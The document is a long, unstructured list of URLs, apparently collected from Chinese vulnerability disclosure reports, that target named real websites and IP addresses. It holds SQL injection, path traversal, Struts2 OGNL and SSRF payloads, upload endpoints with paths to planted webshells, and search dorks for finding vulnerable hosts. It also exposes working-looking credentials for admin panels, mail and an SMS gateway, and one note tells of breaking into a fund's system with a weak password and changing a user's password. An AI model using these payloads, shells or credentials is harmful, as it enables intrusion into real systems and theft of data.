https://github.com/frogbink/wap_729/blob/6edfeff4e6afb0321ea5680f34a4ee8000f4c7fd/%E5%90%8E%E5%8F%B0%E8%B4%A6%E5%8F%B7.txt http://**.**.**.** http://**.**.**.**/bak.jspx http://is.gd/WZcXwJ http://club.120ask.com/ http://club.120ask.com/admin.php http://**.**.**.**:80/index.html https://github.com/collonn/MyBatisGen/blob/f4a4c72cc173f9450ba8304bceffc483881c70b0/src/main/resource/config.properties jdbc:oracle:thin:@crh3.rails.cn:5002:crhrdt http://crh3.rails.cn:8008/sw/ https://github.com/gaitian/project/blob/97d02946eab3e3f18aeef6f97702eb9c0295748e/trunk/protected/config/params.php http://**.**.**.**/products.aspx?keywords= http://www.ourteacher.com.cn)主站前台SQL注入可直接明文获取3897个教师用户名、密码(后台登录可查看修改教师身份证号码/手机号/邮箱/工作单位/学历等) http://wap.cfsc.com.cn/phpMyAdmin/ http://**.**.**.**/v6/user/register.html http://**.**.**.**/v6/user/setPwd.html?param=18111111111&r=1443505665447 http://www.now.cn/ipm-admin/cusManager.php?IDIPM=55911 http://www.now.cn/ipm-admin/cusManager.php?IDIPM=55911 http://sqlmap.org http://**.**.**.**/sreach.aspx?keystr=123 https://github.com/chqu21/laravel/blob/b6797eb540cb81c58b21a258b2eddd9d3bc0d6ba/config/sms.php http://61.145.229.29:7791/MWGate/wmgw.asmx/MongateCsSpSendSmsNew?userId=H10308&password=986579&pszMobis=手机号&pszMsg=乌云&iMobiCount=1&pszSubPort=* http://comments.cnmo.com/doc_vote2010.php?document_id= http://**.**.**.**/hwt2/Main/Login http://www.lushanly.com/yewu.php?a_id=4 http://wx.zj.sgcc.com.cn/web/wechat/wechatf/accountManage.do? 
http://oa.betop-cn.com:8080//yyoa/common/js/menu/test.jsp?doType=101&S1=select http://**.**.**.**/UserCenter/MemberDirectory.aspx?MemberType=104* http://**.**.**.**:8086/gov/newsread.asp?id=254%20and%201=1 http://erm-kbs.ruc.edu.cn/ http://www.ztemt.com/cn http://se-office.ruc.edu.cn/index.php?do=list&channelid=19393 http://se-office.ruc.edu.cn/cn/index.php?do=caseview&caseid=35861 http://se-office.ruc.edu.cn/files.php?fid=1924 http:/xxx http://pub2.whut.edu.cn/icea/civilsite/teacherdetail.asp?classid=42&id=78 http://**.**.**.**:7001/webroot/main/login.jsp http://**.**.**.**:7001/console/login/LoginForm.jsp http://wap.cnht.com.cn/dlarea/dl_pt.php?ptid=28&ptname=symbian&vername=%E9%AB%98%E7%AB%AF%E7%89%88&verid=22 http://**.**.**.**:8089/BookLibrary/BookListImages.aspx?ClassPath=07.13&ClassTypeID=7 http://**.**.**.**:8082/BookLibrary/BookListImages.aspx?ClassPath=07.13&ClassTypeID=7 http://**.**.**.**:8001/BookLibrary/BookListImages.aspx?ClassPath=07.13&ClassTypeID=7 http://**.**.**.**/BookLibrary/BookListImages.aspx?ClassPath=07.13&ClassTypeID=7 http://**.**.**.**:8089/BookLibrary/BookListImages.aspx?ClassPath=07.13&ClassTypeID=7 http://**.**.**.**:8080/sztnet/qryCard.do http://**.**.**.**:8080/mbapp/upload.jsp http://**.**.**.**:8080/mbapp/file.jsp http://**.**.**.**:8080/mbapp/upload/1_1443170412936_0.jsp jdbc:oracle:thin:@**.**.**.**:1521:sztweb jdbc:oracle:thin:@**.**.**.**:1521:orcl http://srm.jinjianghotels.com/JJSRM/Register/Register_Step2.aspx http://jiekou.srm.jinjianghotels.com/JJSRM_upload/Vendor/about20140925215556492.aspx http://jiekou.srm.jinjianghotels.com/JJSRM_upload/Vendor/ASPXxm20120707015654218.aspx http://jiekou.srm.jinjianghotels.com/JJSRM_upload/Vendor/120140925221403009.aspx http://**.**.**.**/hrjs/ http://**.**.**.**/hrjs/downloadresume?&filepath=0001AA100000000232OZ.doc http://**.**.**.**/hrjs/downloadresume?filepath=C%3A%5CWindows%5Csystem.ini 
http://report.galaxyasset.com/logon.jsp,银河基金投资研究管理系统,此处验证码可重用,用常用用户名和弱口令123456可获得一个有效账号lixia,登陆时会提醒修改密码,这里我将其密码修改成了hello123,登陆后可看到84万多份分析报告,评级有买入、增持等。是不是跟着买就能成为百万富翁,2333~~ http://wap.mmall.com/index.php?r=goods/search http://**.**.**.**/web/jsda/default.aspx http://180.76.129.200:8080/pay/pay.do?redirect=../../WEB-INF/classes/datasource-config.xml%3f http://s.wanxue.cn/pay/pay.do?redirect=../../WEB-INF/classes/datasource-config.xml%3f https://github.com/liduanfeng/SouthMountain/blob/44ed9ff381e4ca1f1a92956f37e410454f73fd90/%E9%A1%BA%E9%A3%8E%E5%B7%A5%E4%BD%9C-%E4%B8%AA%E4%BA%BAPC%E7%99%BB%E5%BD%95%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E5%8F%8A%E7%94%B5%E8%84%91%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE url:http://116.228.53.202:80/manager/html user:admin pass:admin www.sxhtjs.com.cn http://app.b5m.com/?mps=____ http://m.b5m.com/api/ucenter?action=getAddressDetail inurl:cms/cms/infopub http://**.**.**.**/cms/cms/infopub/sendmail.jsp http://**.**.**.**/cms/cms/infopub/sendmail.jsp http://**.**.**.**/cms/cms/infopub/sendmail.jsp http://**.**.**.**/cms/cms/infopub/sendmail.jsp http://**.**.**.**/cms/cms/infopub/sendmail.jsp http://**.**.**.**/cms/cms/infopub/sendmail.jsp http://**.**.**.**/cms/cms/infopub/sendmail.jsp http://**.**.**.**/cms/cmsadmin/wcm/reg/getquestion.jsp http://**.**.**.**/cms/wcm/reg/getquestion.jsp http://**.**.**.**/cms/wcm/reg/getquestion.jsp http://**.**.**.**/cms/wcm/reg/getquestion.jsp http://**.**.**.**/cms/cmsadmin/wcm/reg/getquestion.jsp http://**.**.**.**/cms/wcm/reg/getquestion.jsp http://**.**.**.**/cms/wcm/reg/getquestion.jsp http://**.**.**.**/cms/cmsadmin/wcm/reg/getquestion.jsp http://**.**.**.**/cms/wcm/reg/getquestion.jsp http://**.**.**.**/CHN/Home/HomeList_Search.asp?SearchString=1 http://**.**.**.**/CHN/Home/HomeShow.asp?ContentId=1 http://mail.hisense.com/ http://**.**.**.**/ http://www.zjlh.com.cn/VSSR4/ http://www.zjlianhua.com/talentdata/uddiexplorer/SearchPublicRegistries.jsp http://**.**.**.**/,如图所示: 
http://**.**.**.**/nanjing/newhos/Sizechart.jsp?count=2&hosId=432E7819-A699-4F1A-B172-975A61629100,如图所示: http://**.**.**.**/nanjing/newhos/Sizechart.jsp http://**.**.**.**/nanjing/newhos/Sizechart.jsp http://**.**.**.**/nanjing/newhos/Sizechart.jsp http://**.**.**.**/nanjing/newhos/Sizechart.jsp http://**.**.**.**/nanjing/newhos/Sizechart.jsp http://**.**.**.**/trade/data/goods.jsp?F04=&F01=&F25=&F26=&F28=&F27= jdbc:oracle:thin:@**.**.**.**:1521:goldts1 http://**.**.**.**/viewNews.do?ctid=5&id=381 http://klyg.njzq.cn//uddiexplorer/SearchPublicRegistries.jsp http://klyg.njzq.cn//uddiexplorer/SetupUDDIExplorer.jsp http://klyg.njzq.cn//uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.0.197:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://klyg.njzq.cn//uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.0.197:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://klyg.njzq.cn//uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.0.196:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://www.yestime.net/scb/scb.php?id=2427 http://58.245.254.229/edms/index.php http://222.161.12.132/edms/index.php# http://alwayson.hp.com.cn/AAS/CsoPartInfo.aspx?no=HPSS901178&id=1 http://www.eventdove.com/ http://isc2015.eventdove.com/ http://2w4fc0yc.eventdove.com/ http://new.citsbj.com:80/ http://zyzj.skymoons.com/mobile/news.php?id=156&pos=hd http://user.ftchinese.com/login http://tts.ttkuaiche.com/carwash/financeController!getUserFinanceAccount.spr url:http://creative.yun.pingan.com/index.php/vote/vote_detail/id/4 http://www.cairenhui.com/case.html http://mail.cairenhui.com http://git.cairenhui.com/users/sign_in http://job.100tal.com/ user:admin http://agency.1jiajie.com/index.php http://**.**.**.**/bugs/wooyun-2010-0119536 
http://**.**.**.**/web/mainpage/GZLY/LY_List.aspx?ID=3062 http://**.**.**.**/mainpage/GZLY/LY_List.aspx?ID=3062 http://**.**.**.**/mainpage/GZLY/LY_List.aspx?ID=3062 http://**.**.**.**/mainpage/GZLY/LY_List.aspx?ID=3062 http://**.**.**.**/jnpm/default.aspx?ReturnUrl=%2fjnpm%2fmain.aspx http://alwayson.hp.com.cn/AAS/ASC/reportpartreturn.aspx?strList=HHZC8000731,HHZC8000721,HHZC8000722 http://**.**.**.**/ http://mdv.midea.com/midea/gallery/news-list.action http://dg.2144.cn/whole?cid=1 http://**.**.**.**/bm_tpl/chuli_tpl.php?new_id=a http://ehr.xsdzq.cn/ehr/login.jspa app.laoyuegou.com/tag/join?token=***&user_id=这个参数有注入!这个参数有注入!这个参数有注入!重要的事情说三遍&tag_id=349515&appid=1003&request=1443578689&sign=***&appfrom=104&appver=2.2.3 http://ms.baihe.com/ http://**.**.**.**/system/welcome.do http://210.14.152.122:8888/ http://**.**.** http://**.**.**/ http://kf.2144.cn/query?content=1&type=3 http://**.**.**.**/frontpage/gqhqNotice.jsp?noticeType=lsgg&gqhqId=%27%22 http://xm.2144.cn/whole?cid=1 http://**.**.**.**/yccg/yccg.htm http://**.**.**.**/ http://**.**.**.**/dede/login.php?gotopage=%2Fdede%2Findex.php http://www.crcgas.net/360cp/login.asp http://www.crcgas.net/360cp/manager/adminedit.asp http://www.daai.tv/daai-web/more/project.php?c=986%20and%201%3d2 http://www.daai.tv/daai-web/more/../more/project.php?c=909%20and%201%3d2&fm=icon http://www.sooker.com/index.php?app=netschool&act=clist&cate_id=2998 http://www.niu.com/ http://**.**.**.**/shixibao/e/extend/company.php?id=10504 http://vc.xsdzq.cn/ index.php/house/ajax_set_score/?s=0.44206551369279623 http://bt.loupan.com/ http://www.jobuy.com/ http://www.jobuy.com/getjob.ashx http://**.**.**.**/shixibao/e/extend/result.php?id=7538%200%200%20-%20- https://github.com/yuexueyu/wu06/blob/eb0bccb94e237531fa1c2081c55a358bd1912409/wx/weixinCommonConfig.php http://**.**.**.**/ https://**.**.**.**/wcm/servlet/PrintMc50?aaz257=0000465134 http://i.baidu.com/hello.php http://**.**.**.**:7001/newsedit/e5workspace/Login.jsp 
http://zzjz2.edong.com/webmall/query.php?page=1&catid=43&typeid=0&myord=id&myshownums=&author=&fromprice=&toprice=&key= http://zzjz2.edong.com/webmall/query.php?key=88952634&imageField=88952634&catid=0&typeid=0&myord=88952634 http://**.**.**.** http://**.**.**.**/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=c:/ http://**.**.**.**/FCKeditor/editor/filemanager/browser/default/browser.html?&Connector=../../connectors/aspx/connector.aspx http://202.116.0.231 http://**.**.**.** http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/ http://**.**.**.**/app/jspx.jspx http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/ http://**.**.**.**/app/jspx.jspx http://**.**.**.**:8088/nlw/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/ shell:http://**.**.**.**:8088/nlw/app/jspx.jspx http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/ http://**.**.**.**/app/jspx.jspx http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/ http://**.**.**.**/app/jspx.jspx http://**.**.**.**/fsm/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/ shell:http://**.**.**.**/fsm/app/jspx.jspx http://mail.hupu.com http://wooyun.org/bugs/wooyun-2015-0126535 http://php.tech.sina.com.cn/elec/search/compare_elec.php?pid=1&tid=54 http://email.jnu.edu.cn/extmail/cgi/index.cgi http://www.telecomhr.com/main/person.php?id=123922 http://**.**.**.** http://**.**.**.**:8088/nlw/cms/video/video_upload.jsp http://**.**.**.**:8088/nlw/cms/video/selectvideo.jsp http://**.**.**.**:8088/nlw/cms-data/flv/20150930165859108290090.jspx http://**.**.**.**/cms/video/selectvideo.jsp http://**.**.**.**/cms-data/2015/09/30/20150930165219479246629.jspx 
http://**.**.**.**/cms/video/selectvideo.jsp http://**.**.**.**/cms-data/flv/20150930173415057228955.jspx http://**.**.**.**/cms/video/selectvideo.jsp http://**.**.**.**/cms-data/2015/09/30/20150930173042976695275.jspx http://**.**.**.**/fsm/cms/video/selectvideo.jsp http://**.**.**.**/fsm/cms-data/flv/20150930170241727290063.jspx http://lac.jnu.edu.cn/webmanage/index.aspx jdbc:oracle:thin:@**.**.**.**:1521:testdb http://**.**.**.**/index.asp http://**.**.**.**/seach.asp http://**.**.**.** http://**.**.**.**/seach.asp http://**.**.**.** http://**.**.**.**/seach.asp http://**.**.**.** http://**.**.**.**/ajax_check_user.php?email=x http://**.**.**.**/ajax_check_user.php?email=x https://github.com/thaisday/Kili/blob/c3f57f07be8cf7ae4a3a39b8e45f55136cf59ca1/Gibbs/proxy/emailProxy.py http://**.**.**.**/tjcx/64768.htm http://**.**.**.**/xyy2/%28S%28231dwu2ymtkd0445vfjhs355%29%29/tijian/Default.aspx http://**.**.**.** http://**.**.**.**/fsmcms/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/xx.txt http://**.**.**.**/fsmcms/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/xx.txt http://**.**.**.**/fsmcms/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/xx.txt http://**.**.**.**/fsmcms/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/xx.txt http://snsvote.hupu.com/update_vote_new.php?showtype=note&voteid=269955&jsoncallback=jsonp1443605172150&_=1443605185396 http://**.**.**.**/discount.php?brand_id=32 index.php/house/ajax_set_support/?s=0.8241803899873048 http://cf.loupan.com/ FF357B3DDB2593F8F2696C18ED54B674:FG=1 http://oa.ebscn.hk/names.nsf?Login&UserName=gracefu&Password=108061&RedirectTo=/weboa/webpage.nsf http://new.citsbj.com/line/s/chengde?des=desc>ype=1&ord=* http://new.citsbj.com/line/s/nadaihe?des=desc>ype=1&ord=*&page=1&type=1 http://new.citsbj.com/line/s/xila?des=desc&ord=*&page=1&zt=%E4%BA%B2%E5%AD%90 
http://new.citsbj.com/visa/search?des=desc&keyword=*&ord=Clicks&type=* http://**.**.**.**/waptwo/**.**.**.**o?businessId=3 http://**.**.**.**/member/register.aspx http://**.**.**.**//registersuccessful.aspx?id=b18c9e79-25bb-430d-82f2-fd950aaca6f4 http://addunit.91huayi.com/secure/login.aspx http://www.fsmcms.com.cn http://sl.huatu.com/package.php?id=1&markStyle=1 http://bm.huatu.com/m/view.php?id=586701 http://exam.huatu.com/index.php?c=zhentgf&a=ztgf&courseid=3&ksgf=1 http://**.**.**.**/weixinpage/sentence.php, jdbc:oracle:thin:@**.**.**.**:1521:ORCL http://wap.cnht.com.cn/manager/welcome.php http://wap.cnht.com.cn http://**.**.**.**:7002/mashouse/common/login.jsp http://**.**.**.**:7002/console/login/LoginForm.jsp http://www.willsonye.com/ http://www.willsonye.com/ShowTutorial.asp?tID=202 http://mail.gdzhongjian.com/wooyun.txt http://subcompany.crgdpharm.com/wooyun.txt http://www.crgdpharm.com/wooyun.txt http://elastic.fun.tv/_status http://elastic.fun.tv/_nodes http://elastic.fun.tv/_search?preety http://**.**.**.**/bugs/wooyun-2015-0131632 http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2013-032355 www.sxhtjs.com.cn http://**.**.**.**/ http://monitor.fotoplace.cc:8080/script http://mall.vivo.com.cn/.git/config https://recruit.panasonic.cn/portal/recruitment/list.do https://recruit.panasonic.cn/portal/recruitment/list.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://ilife.homelink.com.cn/store/ http://ilife.homelink.com.cn/store.zip http://ilife.homelink.com.cn/aigou/aigou.zip http://admin.dev.skymoons.com/ http://**.**.**.**/bys/dacx.aspx 
https://github.com/suker413/python/search?utf8=%E2%9C%93&q=mail mail:2081276696@qq.com pass:cninsure2013 https://www.letoudai.com/invest/index/1*/export/1/serial_number/1/money/1 http://**.**.**.**/index.php?m=Article&temp=yhsc&cate_id=13 http://**.**.**.**/index.php?m=Goods&cate_id=2 http://**.**.**.**/index.php?m=Goods&temp=jingpin&cate_id=10 http://**.**.**.**/index.php?m=About&id=23 http://mail.chinadrtv.com/ http://cba.sports.sina.com.cn/rockets_live.php?id=208 http://**.**.**.**/pingajs/login.index http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1 http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1 http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1 https://**.**.**.** http://film.spider.com.cn/tickdating.html?order=hotdating&type=zfLIo4 http://wooyun.org/bugs/wooyun-2010-0114565 http://**.**.**.**/gfms/app/apk/html/ http://**.**.**.**/book/detailBook.jsp?rec_ctrl_id=01h0108500 http://**.**.**.**:8080/book/detailBook.jsp?rec_ctrl_id=01Y0018474 http://**.**.**.**:8080/book/detailBook.jsp?rec_ctrl_id=0100034803 http://**.**.**.**/book/detailBook.jsp?rec_ctrl_id=01h0011897 http://**.**.**.**:8080/opac/book/detailBook.jsp?rec_ctrl_id=01h0050376 http://**.**.**.**/book/detailBook.jsp?rec_ctrl_id=01h0108500 http://**.**.**.**:8080/book/detailBook.jsp?rec_ctrl_id=01Y0018474 http://**.**.**.**:8080/book/detailBook.jsp?rec_ctrl_id=0100034803 http://**.**.**.**/book/detailBook.jsp?rec_ctrl_id=01h0011897 http://**.**.**.**:8080/opac/book/detailBook.jsp?rec_ctrl_id=01h0050376 inurl:detailBook.jsp?rec_ctrl_id= http://**.**.**.**/book/detailBook.jsp?rec_ctrl_id=01h0108500 http://**.**.**.**:8080/book/detailBook.jsp?rec_ctrl_id=01Y0018474 http://**.**.**.**:8080/book/detailBook.jsp?rec_ctrl_id=0100034803 http://**.**.**.**/book/detailBook.jsp?rec_ctrl_id=01h0011897 http://**.**.**.**:8080/opac/book/detailBook.jsp?rec_ctrl_id=01h0050376 http://**.**.**.**/ 
http://**.**.**.**/www/index.php?mod=index&con=search&act=advanceResult http://**.**.**.**/www/index.php?mod=index&con=search&act=search http://**.**.**.**/www/index.php?mod=index&con=search&act=search http://**.**.**.**/www/index.php?mod=index&con=search&act=Advance http://**.**.**.**/www/index.php?mod=index&con=search&act=Advance http://**.**.**.**/www/index.php?mod=index&con=search&act=search http://focus-login.sohusce.com/auth?index=1 http://team.oschina.net/ http://**.**.**.**/fckeditor/editor/filemanager/browser/default/connectors/test.html http://**.**.**.**/WebSite/FCKFiles/Image/AspxSpy2014Final.aspx http://emarketing.sina.com.cn/case.php?b=49 http://www.cr-leasing.com.cn/ www.cr-leasing.com.cn http://www.cr-leasing.com.cn http://**.**.**.**/webmail/signOn.do http://**.**.**.**/s/1hqEpdKo http://**.**.**.**/s/1i3JCEs1 http://www.haolyy.com/retail/156938?nid=bopu201509300509101777E1AF http://www.haolyy.com/build/image/riskimg/1.jpg http://www.haolyy.com/build/image/riskimg/2.jpg http://www.haolyy.com/build/image/riskimg/3.jpg http://www.haolyy.com/build/image/riskimg/4.jpg http://www.haolyy.com/build/image/riskimg/5.jpg http://zxy.iy6.cn/?action=detail&id=85 http://jjsg.iy6.cn/?action=detail&id=4825 http://xyfm.iy6.cn/?action=detail&id=2935 http://wj.iy6.cn/?action=detail&id=3581 http://rxhzw.iy6.cn/?action=detail&id=26 http://wj2.iy6.cn/?action=detail&id=3226 http://smsg.iy6.cn/?action=detail&id=2946 http://xyfm.iy6.cn/?action=detail&id=2935 http://zxy.iy6.cn/?action=detail&id=85 http://zxy.iy6.cn/?action=detail&id=85 http://azyfy.51yuyi.com/如图所示: http://azyfy.51yuyi.com/doctor_introduction.jsp?hosid=42&hospitalid=42&docid=1069,如图所示: http://azyfy.51yuyi.com/doctor_introduction.jsp?hosid=42&hospitalid=42&docid=1069"如图所示: http://**.**.**.**/mylogon/page/searchshow.jsp?query= http://**.**.**.**/mylogon/product.do?method=proinfo&id=S8dskU5C-qfxVXxBb-kcLQg5WI-zQzV9lCY&csid=568&price=18888 
http://**.**.**.**/B1plusPortal/admin/upload/ReadAttach?uid=8a8a81a1s27a55973s1236048fa91ss7fee http://**.**.**.**/bugs/wooyun-2015-0133762 http://**.**.**.**/bugs/wooyun-2015-0133762 http://**.**.**.**/OrderRing.aspx?ringNo=810037308337&type=0&ProgCode=null&Seed=64 http://**.**.**.**/OrderRing.aspx?ringNo=9000700020110901021043&type=0&ProgCode=null&Seed=413&returnUrl=http://**.**.**.**/search.aspx?type=0&keyword=waka%2520waka site:oa.sxhtjs.com.cn http://mail.sxhtjs.com/?hl=zh_CN&msg=ERR.LOGIN.PASSERR http://crm.sxhtjs.com/admin/Login.do http://app.hualongxiang.com http://**.**.**.**:7003/console/login/LoginForm.jsp http://**.**.**.**/index_list_bsbz_content.jsp?pkid=321de9d3-389c-4c63-8230-b4b5a0c7a299 http://**.**.**.**/index_list_bsbz_content.jsp?pkid=321de9d3-389c-4c63-8230-b4b5a0c7a299 http://eman.midea.com.cn:8099/ http://event.midea.com/trial/index?f_id_product=7&version_id=7&appview=1&mtag=20025.19.10001#product http://oa.cnbg.com.cn/seeyon/index.jsp http://oa.sinopharmholding.com/seeyon/index.jsp http://**.**.**.**:7001/console/login/LoginForm.jsp cn:7001/icc/template/006/index.jsp http://kc.hljit.edu.cn:7001/console/login/LoginForm.jsp http://42.62.24.19/empty.zip http://**.**.**.**/ http://**.**.**.**/yufangyixue/Ad_Login.asp http://**.**.**.**/tt/contract/contract_auto_salesorder.asp?mainno=1 http://**.**.**.**/tt/contract/contract_auto_salesorder.asp?mainno=1 http://**.**.**.**/tt/contract/contract_auto_salesorder.asp?mainno=1 http://**.**.**.**/tt/multiinput/ExecuteGetDateProc.asp?stanID=1 http://**.**.**.**/tt/multiinput/ExecuteGetDateProc.asp?stanID=1 http://**.**.**.**/tt/multiinput/ExecuteGetDateProc.asp?stanID=1 http://**.**.**.**/tt/multiinput/multigetproc.asp?inputid=1 http://**.**.**.**/tt/multiinput/multigetproc.asp?inputid=1 http://**.**.**.**/tt/multiinput/multigetproc.asp?inputid=1 http://**.**.**.**/tt/page/Page_ExpBuildingInfo.asp?buildid=1 http://**.**.**.**/tt/page/Page_ExpBuildingInfo.asp?buildid=1 
http://**.**.**.**/tt/page/Page_ExpBuildingInfo.asp?buildid=1 http://facilitator.org.cn/login.php3 http://116.1.1.249/login.php3 http://114.113.17.230/login.php3 http://121.31.5.183:8000/login.php3 http://oa.andess.com/login.php3 http://www.xiezuozhe.org.cn/login.php3 http://agrionline.net.cn/login.php3 http://oa.gxxd.com.cn/login.php3 http://oa.skyoa.com/login.php3 http://agrionline.net.cn/login.php3 http://nxzxoa.skyoa.com/login.php3 http://test.skyoa.com/login.php3 http://www.skyoa.com/phpcms/index.html http://wooyun.org/bugs/wooyun-2015-0144425/trace/3c295fd2133477eb0787a4f4035ac725 http://u.it168.com/Login?returnUrl=http://www.it168.com/,it168主站登录接口 http://**.**.**.**/bugs/wooyun-2015-0144491/trace/ab6f7fd3b93e59a688e43199c2a57019 http://sj.sxhtjs.com.cn/ http://sj.sxhtjs.com.cn/forgotpass/mmsu http://sj.sxhtjs.com.cn/wsbm http://222.177.208.17:8010/login.aspx http://hr.cootek.cn/hradmin/accountd/login http://hr.cootek.cn:80/hradmin/account/login http://**.**.**.**/infocenter.aspx?typeid=1 http://fotoplace.cc/admin/log.txt http://money.hualongxiang.com/cmslist/?id=29&sn=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%96%B0%E9%97%BB%E5%85%B3%E9%94%AE%E8%AF%8D http://m.zyql.cn/?m=android/scenic.scenicDetail&id=64 http://www.bidainet.com/wapwenda/wendashow/1?no=1&state=0&type=24 http://www.76ju.com/?c=ServiceCenter&action=detail&cid=3&id=25 http://www.bailiandai.com/home/index.action https://www.cardadministration.com/login.jsp?mID=PCC https://www.cardadministration.com/login.jsp?mID=PCC%27%20AND%204950=4950%20AND%20%27EWau%27=%27EWau http://**.**.**.**/Web_Org/Type_List.aspx?typeid=1 http://**.**.**.**/Web_Org/Type_List.aspx?typeid=1 http://**.**.**.**/Web_Org/Type_List.aspx?typeid=1 http://**.**.**.**/Web_Org/Type_List.aspx?typeid=1 http://**.**.**.**/Web_Org/Type_List.aspx?typeid=1 http://**.**.**.**/Web_Org/Type_List.aspx?typeid=1 www.kuwo.cn http://cps.jiapin.com http://shop.huaji.com/shop_search.php?fav=&gcate_id=3212&keyword=&page=1&price=asc&sale=&shop_id=1199546477&time= 
http://**.**.**.**/reg.aspx?gwid= http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/acxd.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/yqhtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/zcxt.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/sxzc.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/ychtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/czhtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/llhtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/zkx.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/lfhtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/dthtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/szhtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/csxx.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/jzhtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/xzhtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/tyqy.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/sxhtjs.asp http://euro2012.touzhu.cn/NewsList/1 http://game.kuwo.cn/g/st/CheckEnterGameTime?gid=108&sid=326 http://pan.baidu.com/s/1mg5u0o4 http://**.**.**.**/InfoPage/ShowBidresult.aspx?AnnoID=3065&UrlType=2&SiteItem=127 http://**.**.**.**/InfoPage/ShowBidresult.aspx?AnnoID=3065&UrlType=2&SiteItem=127 http://**.**.**.**/InfoPage/ShowBidresult.aspx?AnnoID=3065&UrlType=2&SiteItem=127 http://tf001.qs.6yoo.com/qs/RemotingServlet port:5800java-jdwp http://gdjh.aipai.com/login.html www.840210808@qq.com www.840210808@qq.com www.diaohui@qq.com www.diaohui@qq.com www.350948926@qq.com www.350948926@qq.com http://game.aipai.com/games.php这里登陆才能上去): http://**.**.**.**/bugs/wooyun-2010-0116346 http://**.**.**.**/bugs/wooyun-2010-086704 http://**.**.**.** http://**.**.**.**/paxy/webLogin/mainPageInit.shtml?uId=2676 http://**.**.**.**/paxy/commonUploadOrDownload/download.shtml?fileId=57 http://**.**.**.**/paxy/webMessage/studentMessageInit.shtml http://**.**.**.**/paxy/mobileAp/viewSpaceLog.shtml?usertype=0&userid=60069&logid=36 http://**.**.**.**/bugs/wooyun-2010-0103484 jdbc:sqlserver**.**.**.**:1433;databaseName=DFZQ_ZYYX jdbc:oracle:thin:@**.**.**.**:1521:tfcrm 
http://**.**.**.**/bugs/wooyun-2010-0123365 http://**.**.**.**/issue/news_more.jsp?Urltype=12&key=&submit=%B2%E9%D5%D2 http://**.**.**.**/issue/news_more.jsp?Urltype=12&key=&submit=%B2%E9%D5%D2 http://**.**.**.**:81/issue/news_more.jsp?Urltype=12&key=&submit=%B2%E9%D5%D2 http://**.**.**.**/issue/news_more.jsp?Urltype=6&key=&submit=%B2%E9%D5%D2%22%20 http://old.admin.1jiajie.com/server-status www.1jiajie.com www.1jiajie.com http://web.1jiajie.dudujiaoche.com///v2/worker_list.php?worker_id=17888&platform_version=worker http://web.1jiajie.dudujiaoche.com//v2/user_list.php?user_id=54286302,32720539,54182323,541214 http://web.1jiajie.dudujiaoche.com//v2/search_order.php?worker_tel=13716953214&per_page=50&pag http://mail.uqee.com:7777/phpmyadmin/ http://mail.uqee.com:7777/phpinfo.php http://zt.mama.cn/admin/login.php http://**.**.**.**/librarian/book/view-all.asp?ID=25 http://**.**.**.**/librarian/admin/admin_login.asp http://**.**.**.**/Reception/evaluation-1.html http://study.**.**.**.**/ 